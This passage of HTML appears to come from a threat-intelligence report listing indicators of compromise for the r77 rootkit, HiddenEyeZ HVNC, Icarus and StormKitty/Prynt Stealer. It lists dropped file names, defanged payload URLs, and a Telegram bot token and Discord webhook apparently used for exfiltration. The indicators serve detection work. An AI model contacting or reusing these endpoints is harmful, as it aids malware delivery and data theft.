<i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_73463261\" rowspan=\"1\" colspan=\"1\" class=\"td_class_73463261\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_73463261\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_1691426\" class=\"desktop-view tr_class_1691426 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_23717580\" rowspan=\"1\" colspan=\"1\" class=\"td_class_23717580\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_23717580\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%TEMP%rk.exe<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_76895514\" rowspan=\"1\" colspan=\"1\" class=\"td_class_76895514\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_76895514\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6136569\" class=\"desktop-view tr_class_6136569 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_98547089\" rowspan=\"1\" colspan=\"1\" class=\"td_class_98547089\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_98547089\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%APPDATA%r77-x64.dll<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_93734290\" rowspan=\"1\" colspan=\"1\" class=\"td_class_93734290\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_93734290\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_4590250\" class=\"desktop-view tr_class_4590250 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_41190777\" rowspan=\"1\" colspan=\"1\" class=\"td_class_41190777\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_41190777\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%APPDATA%r77-x86.dll<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_75787699\" rowspan=\"1\" colspan=\"1\" class=\"td_class_75787699\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_75787699\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>URL\/IP<\/h3>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_15\"\n     id='ninja_table_builder_414263'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_15\"\n     style=\"\n     max-height:800px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414263\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_9923760\" class=\"desktop-view tr_class_9923760 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_37287602\" rowspan=\"1\" colspan=\"1\" class=\"td_class_37287602\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_37287602\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Address<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_34397041\" rowspan=\"1\" colspan=\"1\" class=\"td_class_34397041\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_34397041\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Sample<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_4874701\" class=\"desktop-view tr_class_4874701 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_68072937\" rowspan=\"1\" colspan=\"1\" class=\"td_class_68072937\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_68072937\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">5[.]75.162.22<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_79082795\" rowspan=\"1\" colspan=\"1\" class=\"td_class_79082795\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_79082795\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7271620\" class=\"desktop-view tr_class_7271620 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_27621120\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27621120\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27621120\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">hxxp:\/\/hiddeneyez.com\/icar\/<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_15182562\" rowspan=\"1\" colspan=\"1\" class=\"td_class_15182562\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_15182562\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_4039418\" class=\"desktop-view tr_class_4039418 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_63199501\" rowspan=\"1\" colspan=\"1\" class=\"td_class_63199501\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_63199501\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">hxxps:\/\/api.telegram.org\/bot5905672828:AAGUnoGz8ijN7mSXpHHKho9sOEnmiUyuoC0\/<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_75950241\" rowspan=\"1\" colspan=\"1\" class=\"td_class_75950241\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_75950241\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">StormKitty \/ Prynt Stealer<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6216334\" class=\"desktop-view tr_class_6216334 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_16856335\" rowspan=\"1\" colspan=\"1\" class=\"td_class_16856335\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_16856335\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">hxxp:\/\/193.31.116.239\/crypt\/public\/Update_Downloads\/patata.jpg<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_41825876\" rowspan=\"1\" colspan=\"1\" class=\"td_class_41825876\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_41825876\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC Dropper <\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2387150\" class=\"desktop-view tr_class_2387150 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_21758580\" rowspan=\"1\" colspan=\"1\" class=\"td_class_21758580\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_21758580\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">hxxps:\/\/raw.githubusercontent.com\/HiddenEyeZ\/tg\/main\/rt.jpg<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_87344181\" rowspan=\"1\" colspan=\"1\" class=\"td_class_87344181\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_87344181\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC Dropper <\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2789143\" class=\"desktop-view tr_class_2789143 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_30649423\" rowspan=\"1\" colspan=\"1\" class=\"td_class_30649423\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_30649423\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">hxxps:\/\/i.ibb.co\/kDLd65M\/dcicon.png<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_40737529\" rowspan=\"1\" colspan=\"1\" class=\"td_class_40737529\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_40737529\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Icarus<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5111702\" class=\"desktop-view tr_class_5111702 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_61058320\" rowspan=\"1\" colspan=\"1\" class=\"td_class_61058320\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_61058320\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">hxxps:\/\/i.ibb.co\/RvwvG2z\/icaruwsdr-athens.png<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_66038922\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66038922\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66038922\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Icarus<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6739773\" class=\"desktop-view tr_class_6739773 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_22994631\" rowspan=\"1\" colspan=\"1\" class=\"td_class_22994631\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_22994631\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">hxxps:\/\/discord.com\/api\/webhooks\/995609071304593409\/IOLhP3ykqEdZcTv7nJgfKJfoNaRwLOZX3dgmUFTXow93vFkbG4e9gVYaDjfaHkGc3x6M<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_87869924\" rowspan=\"1\" colspan=\"1\" class=\"td_class_87869924\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_87869924\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Icarus<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_1086325\" class=\"desktop-view tr_class_1086325 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_81411341\" rowspan=\"1\" colspan=\"1\" class=\"td_class_81411341\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_81411341\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">208.95.113.1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_12964220\" rowspan=\"1\" colspan=\"1\" class=\"td_class_12964220\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_12964220\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Icarus<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>Commandes<\/h3>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_16\"\n     id='ninja_table_builder_414262'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_16\"\n     style=\"\n     max-height:800px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414262\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6309591\" class=\"desktop-view tr_class_6309591 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_12831782\" rowspan=\"1\" colspan=\"1\" class=\"td_class_12831782\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_12831782\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Commands<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_26209551\" rowspan=\"1\" colspan=\"1\" class=\"td_class_26209551\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_26209551\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Sample<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5649534\" class=\"desktop-view tr_class_5649534 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_24939470\" 